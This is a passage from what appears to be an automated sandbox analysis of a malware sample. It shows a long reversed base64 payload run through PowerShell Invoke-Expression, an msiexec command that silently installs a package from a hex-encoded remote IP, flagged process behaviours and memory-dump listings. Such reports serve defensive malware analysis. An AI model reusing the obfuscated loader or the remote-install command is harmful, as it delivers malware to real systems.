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\" $base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null $LoadCode = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"$base64\")) Invoke-Expression $LoadCode"2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"3⤵
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" /Q /I http://0x36C2CB14:8080/Tmkngomu/FH9ZDxBqVGEDVUQzDjpoaAALAiNOZU1UAB5+ SDFDSFKLJ=!O+}i[cP61wU?TY_3g{M~Ry2l*H3⤵
- Unknown use of msiexec with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1120-142-0x0000000000000000-mapping.dmp
-
memory/1748-132-0x00007FFD1B230000-0x00007FFD1B240000-memory.dmpFilesize
64KB
-
memory/1748-134-0x00007FFD1B230000-0x00007FFD1B240000-memory.dmpFilesize
64KB
-
memory/1748-133-0x00007FFD1B230000-0x00007FFD1B240000-memory.dmpFilesize
64KB
-
memory/1748-135-0x00007FFD1B230000-0x00007FFD1B240000-memory.dmpFilesize
64KB
-
memory/1748-136-0x00007FFD1B230000-0x00007FFD1B240000-memory.dmpFilesize
64KB
-
memory/1748-137-0x00007FFD188D0000-0x00007FFD188E0000-memory.dmpFilesize
64KB
-
memory/1748-138-0x00007FFD188D0000-0x00007FFD188E0000-memory.dmpFilesize
64KB
-
memory/1748-150-0x00007FFD1B230000-0x00007FFD1B240000-memory.dmpFilesize
64KB
-
memory/1748-149-0x00007FFD1B230000-0x00007FFD1B240000-memory.dmpFilesize
64KB
-
memory/1748-148-0x00007FFD1B230000-0x00007FFD1B240000-memory.dmpFilesize
64KB
-
memory/1748-147-0x00007FFD1B230000-0x00007FFD1B240000-memory.dmpFilesize
64KB
-
memory/2732-144-0x0000000000000000-mapping.dmp
-
memory/4020-145-0x00007FFD32330000-0x00007FFD32DF1000-memory.dmpFilesize
10.8MB
-
memory/4020-143-0x00007FFD32330000-0x00007FFD32DF1000-memory.dmpFilesize
10.8MB
-
memory/4020-141-0x00007FFD32330000-0x00007FFD32DF1000-memory.dmpFilesize
10.8MB
-
memory/4020-140-0x000002A9F85F0000-0x000002A9F8612000-memory.dmpFilesize
136KB
-
memory/4020-139-0x0000000000000000-mapping.dmp